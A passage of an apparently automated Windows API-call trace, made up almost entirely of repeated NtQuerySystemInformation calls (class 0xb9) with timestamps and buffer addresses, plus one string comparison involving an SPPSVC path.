(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0240.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.802] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.811] 